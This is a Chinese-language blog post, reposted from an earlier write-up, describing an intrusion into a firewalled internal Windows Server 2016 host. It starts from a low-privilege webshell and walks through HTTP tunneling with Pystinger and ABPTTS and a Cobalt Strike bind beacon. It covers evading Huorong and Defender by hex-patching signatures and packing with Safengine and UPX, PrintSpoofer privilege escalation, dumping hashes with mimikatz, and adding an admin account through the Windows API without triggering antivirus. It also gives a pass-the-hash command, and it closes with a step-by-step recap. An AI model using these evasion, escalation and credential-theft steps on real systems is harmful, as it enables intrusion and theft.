内网渗透--突破安全策略上线CS

- 日理万妓 2024-04-07 10:34 72阅读 0赞

## 前言 ##

本文为一篇利用非常规手段突破安全策略的内网渗透记录

## 环境简述&说明 ##

**web打点getshell，webshell是冰蝎，权限为.net，权限很低，服务器为server 2016，目标不出网！**

[![422ac6c31b78dcea248d7ee2d1c9e93f.png][]][422ac6c31b78dcea248d7ee2d1c9e93f.png 1]

**装有杀毒软件(火绒、微软自带的WD)，ASMI默认开启，而且对power shell有特殊策略限制。**

[![d069e4295d053949ce58e4b8dbd3764d.png][]][d069e4295d053949ce58e4b8dbd3764d.png 1]

**Tcp、icmp、DNS协议不通，无法直接与公网的cs服务端建立连接，(内网的cs服务端也无法与其建立连接)公网也无法访问目标web服务(纯内网web服务)**

**极其严格的出入站策略**

入站规则：只有http允许入站，只有一个80、8080两http端口能供内网机器正常访问  
出站规则：不允许非8080端口对外通讯。  
手绘了一张拓扑图，将就着看一下。 [![af3d5f3bfcacac5e2b89d77a8e412899.png][]][af3d5f3bfcacac5e2b89d77a8e412899.png 1]

## 为什么要上线cs ##

**webshell权限太低，限制性大，需要上线cs提权，因为cs是采用反射dll来加载pe程序，从而在执行一些敏感操作的时候能起到一定的bypass作用，例如mimikatz抓密码等操作。  
像转储LSA到本地然后再dumphash都是行不通的，因为webshell权限太低了，转储LSA至少得管理员权限。  
而且目标网络环境较为苛刻，任何非http协议的通讯都会被防火墙拦截，无法正常建立一个具有交互功能的shell。**

#### 坑点一：利用Pystinger反向代理上线cs ####

在查阅相关资料后，发现网上大部分文章都通过`Pystinger`来实现内网反向代理，利用http协议将目标机器端口映射至cs服务端监听端口，能在只能访问web服务且不出网的情况下可以使其上线cs。  
**但是这里有个问题，公网cs服务器无法访问目标的web服务，只有同处于在一个内网的机器才能访问目标web服务，所以无法直接在服务器上搭建pystinger将目标机端口反向代理至公网cs监听端口上。  
这里采用的解决方法是直接在本机上搭建一个cs服务，然后再进行pystinger反代操作。**

[![38fa8173936ef5962d221a5483b48be6.png][]][38fa8173936ef5962d221a5483b48be6.png 1]

1.  本地起一个cs服务[![71402643a75bf79b5bc3b0478165b0b4.png][]][71402643a75bf79b5bc3b0478165b0b4.png 1]
2.  常规配置reserver型监听器，监听端口`60020`(上面图中6002少写了个0...)
3.  proxy.aspx上传至目标服务器，访问：[![1431d930e38df110a8b9a2019bf78fa2.png][]][1431d930e38df110a8b9a2019bf78fa2.png 1]  
    4.stinger\_server.exe 上传到目标服务器，执行命令：
    
        start D:\stinger_server.exe 0.0.0.0
    
    [![333fadf18b4402ef14380b2b6c4238cb.png][]][333fadf18b4402ef14380b2b6c4238cb.png 1]  
    5.跳板机本地执行命令：
    
        stinger_client -w http://10.1.1.1:8080/2.aspx-l 0.0.0.0 -p 4002
    
    [![4e9be36b817c1b043fad40edb0366a43.png][]][4e9be36b817c1b043fad40edb0366a43.png 1]  
    6.免杀处理一下`resever_bind`，上传至目标并执行不上线，执行一下tasklist发现shell.exe已经执行了，就是不上线，pystinger报错。[![c2844c29eb13ba1fa5e0c71b604631dc.png][]][c2844c29eb13ba1fa5e0c71b604631dc.png 1]  
    最后的结果是，报错，具体原因不知道，可能是目标web环境有问题，可能是reserver型shell通讯有问题。  
    遂Pystinger反代上线cs失败。

#### 坑点二：正向代理+正向shell上线公网CS ####

**既然反向代理行不通，那就用正向代理，然后采用正向shell来连接。  
目标机器不出网，本机能出网，可通过本机当作跳板机将目标机器的正向shell带出来。  
原理图：**

[![89f087fb7230ad070953444442b70a10.png][]][89f087fb7230ad070953444442b70a10.png 1]

**常见的http隧道工具`Neo-reGeorg、reGeorg`(应该这两款用的比较多)能适用于大多数网络环境，但是在这里就是不行，会出现跳板机直接与cs服务器断开的情况，而cs的connect正向连接请求是由跳板机的beacon发出的，你只能将beacon代理进socks隧道才能使connect请求能连接正向shell的监听端口，但因为目标机不出网，在跳板机的beacon进入代理隧道之后是无法连接到处于公网的cs服务端的，所以只能是端口对端口映射，而不能用http协议搭建的socks隧道(我猜的)。**

所以这里将使用`ABPTTS`进行http隧道搭建。

*  **ABPTTS优点  
    对抗特征检测十分优秀  
    创建的隧道十分稳定**

### 1、 配置abptts： ###

python abpttsfactory.py -o server \\生成服务端脚本，初始化。

[![d9c8cab490b77597185cc2c00b67c5f4.png][]][d9c8cab490b77597185cc2c00b67c5f4.png 1]

### 2、 上传server脚本到目标机器 ###

#### 坑点三：文件上传 ####

**这个地方冰蝎、大马都传文件传不上去，只能用哥斯拉的大文件上传把abptts.aspx传了上去(后面exe的上传也是用的哥斯拉的大文件上传功能)exe文件落地也是个坑，在正常环境中，我们可以用certutil、powershell等方法下载exe到目标上，但是这台机器他不出网，因为出站规则的原因，甚至都无法访问内网中其他机器的web服务器，最后用哥斯拉的大文件上传解决了这个问题。**

[![b5d9df06547c4a431825a009224c6ae4.png][]][b5d9df06547c4a431825a009224c6ae4.png 1]

上传完成之后的abptts.aspx地址： [http://10.1.1.1:8080/abptts.aspx][http_10.1.1.1_8080_abptts.aspx]  
访问一下abptts.aspx，页面回显一长串密文说明abptts客户端正常 [![d13e728f27263f1c51029361707bca6c.png][]][d13e728f27263f1c51029361707bca6c.png 1]

### 3、 启动http隧道 ###

Python abpttsclient.py -c server/config.txt -u "http://10.1.1.1:8080/abptts.aspx"-f 127.0.0.1:7777/127.0.0.1:1111

> 这里的127.0.0.1:7777是本机端口，127.0.0.1:1111是目标机的端口  
> 意思是将目标机的1111端口通过http隧道映射至本机的7777端口，你向本地的7777端口发送的请求都将转发至目标机的1111端口。

[![7efbbfd6f3e98f77ca7be2b9ce1c5b2d.png][]][7efbbfd6f3e98f77ca7be2b9ce1c5b2d.png 1]

#### 坑点四：正向Bind免杀 ####

### Cs的正向shell介绍(beacon tcp) ###

**正向shell的作用原理是，bind在目标机器上开放一个监听端口，等待其他主机来访问这个监听端口，子Beacon从父Beacon接受请求，而不是直接与cs服务端通讯。  
而反向shell则是，由目标发起请求访问cs服务端的监听端口**

1.  创建一个正向监听器：[![999428d828162fbd820e9b19479819e5.png][]][999428d828162fbd820e9b19479819e5.png 1]
2.  生成正向载荷(在生成正向载荷的时候只能选择stageless Beacon )：[![867c27fd27259cb04322d482f7909615.png][]][867c27fd27259cb04322d482f7909615.png 1]

### 为什么使用正向shell： ###

**假若目标机器的出站规则十分严格且目标也不出网，反向shell在这种情况下则无法正常与cs服务端保持通讯。  
假若采用正向shell的话，在无论他的入站规则多严格，他也不会去阻止本地端口之间的通讯，这样就能绕过严格的出入站规则策略。**

*  通讯过程：  
    **Cs服务端(公网)--> 跳板机(父baecon)--> 7777端口--> 目标8080端口(http隧道)--> 目标1111端口(子baecon)**[![0f1e15dbdc54070cc4d07e565ee3fc43.png][]][0f1e15dbdc54070cc4d07e565ee3fc43.png 1]
 *  Bypass分析  
    **在目标机的防火墙眼中是本地的8080端口与本地的1111端口通讯，而攻击机与目标的8080端口则是正常被允许的交互行为，从而bypass了出入站策略。**

### 正向Bind免杀 ###

上面有提到过目标上有火绒和WD两款杀毒，直接上传正向shell肯定是会被秒杀的，本地测试报毒。

[![1cc7d422d740d93683ace607ffae85e2.png][]][1cc7d422d740d93683ace607ffae85e2.png 1]

Reserver\_Bind免杀较为简单，直接生成shellcode，通过分离免杀等方法加载shellcode。  
但是正向shell不能生成shellcode，它属于 `stageless型Beacon`，而stageless型Beacon无法生成shellcode，所以无法通过常规的分离式免杀来绕过杀毒。

*  提一下`stager`与`stagerless`的区别：  
    stager和stagerless型beacon
 *  **Stager型：只包含简单的加载逻辑部分，stager通过将c2的payload加载进内存从而实现pe加载，这种加载方式也就是反射型DLL加载。**
 *  **Stagerless型：stager+payload全写死在木马中，相比较于Stager型体积更大，特征码更明显。**  
    由下图可以看到，在生成payload的时候没有正向bind监听器这个选项，只有Reserver监听器选项。[![53fd378771a13128ce6f7db808d9ebe5.png][]][53fd378771a13128ce6f7db808d9ebe5.png 1]  
    既然无法通过混淆加载器的方法来免杀，那就`加强壳+定位特征码`的方法来免杀。  
    **国内大部分杀软估计都是基于模糊hash算法的特征码查杀，对代码层强混淆几乎就能绕过大部分杀毒，强壳(ASPack、upx、Safengine、VMPoject，实测Aspack、upx效果不是很好)。**  
    主要用到的工具：`VirTest5.0`\+ `Resource Hacker` \+`SafengineShielden+upx`
 *  VirTest5.0：  
    自动化定位特征码，因为不会汇编，所以就直接用010Editor修改特征码的十六进制来破环特征码。[![866b14c0ffd241aeeda320eecffa1107.png][]][866b14c0ffd241aeeda320eecffa1107.png 1]  
    其他修改特征码的方法: 替换汇编函数、调换指令顺序、置零跳转。  
    注意：在修改完特征码之后，要测试exe还能不能正常运行。
 *  SafengineShielden  
    反LPK注入、反调试器附加、反内存转储选上，复杂度拉满，虚拟机检测不要打勾。[![8b9f8ce0b05c2e0f690c5c1e4a501ea1.png][]][8b9f8ce0b05c2e0f690c5c1e4a501ea1.png 1]  
    最后加一层upx壳(upx壳视情况而定，有时候加了upx壳反而会被杀)，Resource Hacker加入一个任意图标文件，成功过掉火绒。

## 目标机运行正向shell ##

上传正向bind，在冰蝎上执行 D:/beacon\_se.exe，可以看到木马在目标机上开启了1111端口，我们通过http隧道去连接这个位于目标机1111端口上的正向bind。

[![e023d1ea508d66bdd301919b52c61c73.png][]][e023d1ea508d66bdd301919b52c61c73.png 1]

## 本机(跳板)正向连接shell ##

本机(攻击者)上线cs作为跳板机，然后在本机shell中执行

connect 127.0.0.1 7777

[![a719b88351236c522660467953e1f19d.png][]][a719b88351236c522660467953e1f19d.png 1]

成功正向上线 10.1.1.1，但是上线的shell权限极低，mimikatz无法运行，因为正向shell的原因，就算提权成功也无法直接反弹shell，而且因为目标系统是2016，插件中的常见提权脚本都会提权失败。 [![54cd5b3bdd9afdaa9a419abd34aa992d.png][]][54cd5b3bdd9afdaa9a419abd34aa992d.png 1]

### PrintSpoofer提权 ###

上传PrintSpoofer.exe至目标主机。

[![d1d27180fbd601a66b8d4cc8754d180e.png][]][d1d27180fbd601a66b8d4cc8754d180e.png 1]

执行如下命令，以system的权限运行我的正向shell，那么我将得到一个system权限的shell，而不是asp的低权限shell。

C:\Windows\Temp\PrintSpoofer -c D:/1111_se.exe

[![20cc953d38639e56ed88e5f695046f5e.png][]][20cc953d38639e56ed88e5f695046f5e.png 1]

Netstat -ano确认一下有没有在本地开放一个1111端口。 [![a876d9a1705597839914014268d15fef.png][]][a876d9a1705597839914014268d15fef.png 1]  
正向shell正常运行，跳板机再次连接正向bind。

connect 127.0.0.1 7777

[![bbae8ede5b0fb725ed7cf35ce248b7a2.png][]][bbae8ede5b0fb725ed7cf35ce248b7a2.png 1]

成功提权，渗透至此已基本结束战斗，得到一个system权限的正向shell，mimikatz抓密码，无明文，但能拿到hash。 [![8749f716a56f231f024cc4423c6d0fc1.png][]][8749f716a56f231f024cc4423c6d0fc1.png 1]

## 绕过杀毒添加用户&&登录桌面 ##

Net1改名添加用户，报错，必然是被火绒拦截了，上杀器直接驱动层干杀软。

[![e8b42b513464efd9eaa7dada6d254f22.png][]][e8b42b513464efd9eaa7dada6d254f22.png 1]

本地实验能干掉，但是不知道为什么在目标上就实现不了。   
**换思路：火绒、360等国内杀毒拦截添加用户命令往往只针对`net`、`net1`这俩进程，并没有hook底层函数，所以我们只需要不去执行net、net1而去直接调用底层函数就能绕过杀毒的监控。**  
原理不去深度刨析了，网上有文章。

*  Windows API 添加管理员用户  
    项目地址：[https://github.com/newsoft/adduser][https_github.com_newsoft_adduser]  
    绕过杀毒添加上了一个用户，接下来就是常规操作，用打印机漏洞提权，利用sys权限切换到adminsitrator用户的桌面。
 *  hash传递攻击  
    再或者就是hash传递，直接上adminsitrator的桌面。
    
        sekurlsa::pth /user:Administrator /domain:用户名 /ntlm:194f34439dd27846db00c6723036da6b "/run:mstsc.exe /restrictedadmin"194f34439dd27846db00c6723036da6b
    
      
    **Hash传递的好处就是，动静更小，不需要新建用户，留下的痕迹更少，降低攻击者被发现的概率。**  
    如下图：[![bb8168ad7c3f325f3bf873c428253a1c.png][]][bb8168ad7c3f325f3bf873c428253a1c.png 1]  
    跟上面操作一样，把对方的3389端口反向代理至本地，连接之。  
    最后附上登录的桌面的截图，登上来就是一个backstab的报错，这刚好就解释了之前在干火绒的时候，为什么没有kill成功(因为程序兼容性问题导致崩溃了)。[![63a44c4f78b49d221d99eae8723baf80.png][]][63a44c4f78b49d221d99eae8723baf80.png 1]

## 结尾 ##

总结一下整个渗透过程中有趣的几个点，整个流程大概花了两天的时间，主要是有几个地方踩坑了。

1.  **第一点**：写http隧道马的时候，用哥斯拉直接编辑新建一个隧道马，但是连接的时候报错，可能是哥斯拉出现了数据断流，导致写进去的文件缺东西了，后来直接把隧道马传上去就不报错了。
2.  **第二点**：网上的例子大多数都用pystinger反代cs服务端来处理这种不出网上线cs的情况，但是可能因为目标网络环境的不一样导致各种玄学报错，所以Pystinger的局限性还是很大的，而且Pystinger客户端还不免杀。
3.  **第三点**：正向shell免杀，不多说的，cs的无阶段木马都是这样，无法通过混淆加载器的方法免杀。
4.  **第四点**：正向shell的提权，cs插件提权只能反弹一个反射型的shell，无法反弹正向shell。
5.  **第五点**：有趣的是，无阶段木马是能生成powershell脚本的，而powershell脚本是很好混淆免杀的，但是目标是server2016，默认开启AMSI，混淆免杀在它面前形同虚设。(要是目标是2012、2008系统就可以通过powershell正向bind上线)

## 总结 ##

一、环境限制：

1.通过冰蝎连接本机系统服务器,的webshell，低权限,server 2016

2.内网中的目标系统装有火绒，ASMI默认开启，对ps脚本策略有限制。

3.内网中的目标系统不能和公网直接通信，也不能通过dns,tcp,icmp和目标系统通信，但是本机系统可以通过http 8080端口协议访问内网中的目标系统。

二、正向代理突破限制

https://github.com/FunnyWolf/pystinger/blob/master/readme\_cn.md

1.在本机系统中开启cs服务，cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1

2.在本机系统中通过http 8080访问内网目标系统，通过文件上传，上传冰蝎免杀一句话，在本地系统通过冰蝎连接内网目标系统，并同通过冰蝎将CS生成的反射DLL上传到内网目标系统，并执行。

3.将proxy.jsp通过冰蝎上传到内网目标服务器,确保 http://10.1.1.1:8080/proxy.jsp 可以访问,页面返回 UTF-8

4.同时将stinger\_server.exe上传到内网目标服务器,冰蝎下执行start D:\\stinger\_server.exe 启动服务端

3.在本机系统中执行：

stinger\_client -w http://10.1.1.1:8080/proxy.jsp -l 127.0.0.1 -p 60000

此时已经在本机系统 127.0.0.1:60000启动了一个10.1.1.1:8080所在内网的socks4a代理

此时已经将内网的目标服务器的127.0.0.1:60020映射到本机系统的127.0.0.1:60020

三、正向代理+正向shell突破限制

ABPTTS优点：

1.对抗特征检测十分优秀

2.创建的隧道十分稳定

1.本地系统中启动配置abptts

python abpttsfactory.py -o server \\\\生成服务端脚本，初始化

3..将abptts.aspx通过冰蝎上传到内网目标服务器

4.上传完成之后的abptts.aspx地址：http://10.1.1.1:8080/abptts.aspx

5.在本机系统中执行以下命令，启动http隧道

Python abpttsclient.py -c server/config.txt -u "http://10.1.1.1:8080/abptts.aspx"-f 127.0.0.1:7777/127.0.0.1:1111

这里的127.0.0.1:7777是本机端口，127.0.0.1:1111是目标机的端口

将目标机的1111端口通过http隧道映射至本机的7777端口，你向本地的7777端口发送的请求都将转发至目标机的1111端口

6.在公网VPS的上创建cs正向监听器，(name(正向)，payload(beacon tcp), port(1111)

7.生成正向载荷(在生成正向载荷的时候只能选择stageless Beacon )，需要对载荷进行免杀

8.通过010Editor修改载荷特征码的十六进制来破环特征码

9.通过SafengineShielden对载荷进行免，反LPK注入、反调试器附加、反内存转储选上，复杂度拉满，虚拟机检测不要打勾，最后加一层upx壳，Resource Hacker加入一个任意图标文件

10.通过冰蝎将载荷上传到内网目标系统中，并在冰蝎上执行 D:/beacon\_se.exe。

11.在cs命令中执行以下命令，开启正向链接shell

connect 127.0.0.1 7777

12.通过冰蝎将PrintSpoofer.exe上传至内网目标主机以及负载111\_se.exe

13.通过冰蝎执行如下命令，以system的权限运行我的正向shell，那么我将得到一个system权限的shell，而不是asp的低权限shell

C:\\Windows\\Temp\\PrintSpoofer -c D:/1111\_se.exe

14.正向shell正常运行，在CS中命令中再次正向绑定

connect 127.0.0.1 7777

15.将mimikatz进行免杀，然后上传到内网目标系统中，并执行，只能获取到密码hash

16.通过Windows API 添加管理员用户绕过火绒拦截

https://github.com/newsoft/adduser

17.通过hash传递，直接远程内网目标系统

sekurlsa::pth /user:Administrator /domain:用户名 /ntlm:194f34439dd27846db00c6723036da6b "/run:mstsc.exe /restrictedadmin"194f34439dd27846db00c6723036da6b

原文连接： [https://xz.aliyun.com/t/10410][https_xz.aliyun.com_t_10410]

[422ac6c31b78dcea248d7ee2d1c9e93f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6aa84399319942fab00a8b4438a61c42.png
[422ac6c31b78dcea248d7ee2d1c9e93f.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020224737-ab1b9750-31b4-1.png
[d069e4295d053949ce58e4b8dbd3764d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3b98f35ed41b41509a1ee485636dc722.png
[d069e4295d053949ce58e4b8dbd3764d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020224833-cc20a936-31b4-1.png
[af3d5f3bfcacac5e2b89d77a8e412899.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/bd0b81b8e4984dcbb775c1d09897bfcf.png
[af3d5f3bfcacac5e2b89d77a8e412899.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020224951-faffd448-31b4-1.png
[38fa8173936ef5962d221a5483b48be6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1dea1243134f437395546a26662d33cb.png
[38fa8173936ef5962d221a5483b48be6.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020225601-d7aaeb8a-31b5-1.png
[71402643a75bf79b5bc3b0478165b0b4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/aedcbd186cce487487a06caf365180b8.png
[71402643a75bf79b5bc3b0478165b0b4.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020225624-e5314ff6-31b5-1.png
[1431d930e38df110a8b9a2019bf78fa2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e1c2b922f5804ebeb8c95789d53cb862.png
[1431d930e38df110a8b9a2019bf78fa2.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020225804-20b0e64a-31b6-1.png
[333fadf18b4402ef14380b2b6c4238cb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/128cc376df164bdcb17a157a51b33db0.png
[333fadf18b4402ef14380b2b6c4238cb.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020225900-423ea6a8-31b6-1.png
[4e9be36b817c1b043fad40edb0366a43.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4b10016713544fb4a58635f67bc37669.png
[4e9be36b817c1b043fad40edb0366a43.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020225937-58501a94-31b6-1.png
[c2844c29eb13ba1fa5e0c71b604631dc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3a494d2d6033487fa2b88af7302db316.png
[c2844c29eb13ba1fa5e0c71b604631dc.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211020230031-784ffee0-31b6-1.png
[89f087fb7230ad070953444442b70a10.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/64a35d1dabe4493c9db350134e476c47.png
[89f087fb7230ad070953444442b70a10.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021112153-096fb782-321e-1.png
[d9c8cab490b77597185cc2c00b67c5f4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/dd0b4f46e8cd4b568303e3a1581c9777.png
[d9c8cab490b77597185cc2c00b67c5f4.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021112453-7545328e-321e-1.png
[b5d9df06547c4a431825a009224c6ae4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a8a75f074b974cf08946605cdb98c733.png
[b5d9df06547c4a431825a009224c6ae4.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021163944-70bd1cfa-324a-1.png
[http_10.1.1.1_8080_abptts.aspx]: http://10.1.1.1:8080/abptts.aspx
[d13e728f27263f1c51029361707bca6c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7f89f849caf543bf8b29c710291b6ef2.png
[d13e728f27263f1c51029361707bca6c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021170511-ff5c8c54-324d-1.png
[7efbbfd6f3e98f77ca7be2b9ce1c5b2d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/25a5a7530844440eb51ff54aad57e93a.png
[7efbbfd6f3e98f77ca7be2b9ce1c5b2d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021170647-3805eb40-324e-1.png
[999428d828162fbd820e9b19479819e5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7c7436a09e194312b775e2c80a0c1c40.png
[999428d828162fbd820e9b19479819e5.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021113129-611efe60-321f-1.png
[867c27fd27259cb04322d482f7909615.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/d12bd64389f64c9786a9c31e59a86d8b.png
[867c27fd27259cb04322d482f7909615.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021113145-6ab682ea-321f-1.png
[0f1e15dbdc54070cc4d07e565ee3fc43.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5220612dc97a4aadbaacc93950d3dfeb.png
[0f1e15dbdc54070cc4d07e565ee3fc43.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021113302-98658bf0-321f-1.png
[1cc7d422d740d93683ace607ffae85e2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1c79b95fab934879a1ced81d4161c473.png
[1cc7d422d740d93683ace607ffae85e2.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021113401-bb957d7e-321f-1.png
[53fd378771a13128ce6f7db808d9ebe5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a5f242a1a4d64d09a0d49ce9dd155778.png
[53fd378771a13128ce6f7db808d9ebe5.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021113544-f92ad06c-321f-1.png
[866b14c0ffd241aeeda320eecffa1107.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c57ffc04fa69462c9c319a7935df341d.png
[866b14c0ffd241aeeda320eecffa1107.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021113959-90ee02b6-3220-1.png
[8b9f8ce0b05c2e0f690c5c1e4a501ea1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/b50711e007874e4d82f60f72d4765996.png
[8b9f8ce0b05c2e0f690c5c1e4a501ea1.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114040-a97fa00a-3220-1.png
[e023d1ea508d66bdd301919b52c61c73.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/202376bd44a44f1da67932dc57f16f4d.png
[e023d1ea508d66bdd301919b52c61c73.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114212-e08b8c8a-3220-1.png
[a719b88351236c522660467953e1f19d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/011a658f0d1a47ba89a6373ae982be04.png
[a719b88351236c522660467953e1f19d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114401-211c3178-3221-1.png
[54cd5b3bdd9afdaa9a419abd34aa992d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5c43a6d8e2b64cf69b0e3f78f05e2ab4.png
[54cd5b3bdd9afdaa9a419abd34aa992d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114411-27275368-3221-1.png
[d1d27180fbd601a66b8d4cc8754d180e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/2f9f18b5554f4b3eafd0ee88e31d9d6f.png
[d1d27180fbd601a66b8d4cc8754d180e.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021164109-a3a47c94-324a-1.png
[20cc953d38639e56ed88e5f695046f5e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ad5aad90a365451e885f3a0e98f4f346.png
[20cc953d38639e56ed88e5f695046f5e.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114615-70f598e2-3221-1.png
[a876d9a1705597839914014268d15fef.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8227f6d814a64efbbec314589d365691.png
[a876d9a1705597839914014268d15fef.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114624-765edbfe-3221-1.png
[bbae8ede5b0fb725ed7cf35ce248b7a2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4324be4afc3c4a28ac26dcfa560aafeb.png
[bbae8ede5b0fb725ed7cf35ce248b7a2.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114746-a798f254-3221-1.png
[8749f716a56f231f024cc4423c6d0fc1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5c6fae0083c64dd2a743c03f2f9e99e2.png
[8749f716a56f231f024cc4423c6d0fc1.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114809-b51ba00c-3221-1.png
[e8b42b513464efd9eaa7dada6d254f22.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a1ab5e85c4964812b4c62b30c9ed1302.png
[e8b42b513464efd9eaa7dada6d254f22.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021114901-d445cb6a-3221-1.png
[https_github.com_newsoft_adduser]: https://github.com/newsoft/adduser
[bb8168ad7c3f325f3bf873c428253a1c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/839a5c906264498f88358ae856e2c465.png
[bb8168ad7c3f325f3bf873c428253a1c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021115040-0ed1d288-3222-1.png
[63a44c4f78b49d221d99eae8723baf80.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/2d6f9dd41d7149bf800ce64e6a7e9cc6.png
[63a44c4f78b49d221d99eae8723baf80.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211021115124-29994ba0-3222-1.png
[https_xz.aliyun.com_t_10410]: https://xz.aliyun.com/t/10410